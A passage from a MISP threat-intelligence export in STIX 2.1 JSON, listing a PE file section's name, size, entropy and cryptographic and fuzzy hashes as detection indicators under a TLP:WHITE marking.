"value" : "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "1c9fff4a-4705-4728-b3f1-25cbb0a08bf6"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--072b4d8e-b602-458e-9a96-71242a752828" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:45:51.000Z" ,
"modified" : "2020-08-02T18:45:51.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".reloc" ,
"category" : "Other" ,
"uuid" : "f3a2141e-1665-4f09-8239-0f5f1136a6ee"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "db905034-d0c9-473e-8e90-748edeaec6e8"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "5.9461169615076" ,
"category" : "Other" ,
"uuid" : "5d4c0ee8-ddef-4bb7-8828-8e0cc15edea8"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "2e582f4b09f310087abc12cfbf505d06" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "81abf6c2-3ef7-44dd-897c-e71f1f7ee662"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "1d6c92f1a273c02c810e23d72d1458a6fd46fec1" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "ae0607e4-2deb-4276-ab36-ee504bdf95af"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "621cedb3-22b0-49d3-b41d-8aed1cf563c2"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "39882cc0-0ea1-44ec-8532-90ab9ca93fc6"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "d92abd90-8a08-44e9-b5f5-3ce18363dacc"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}
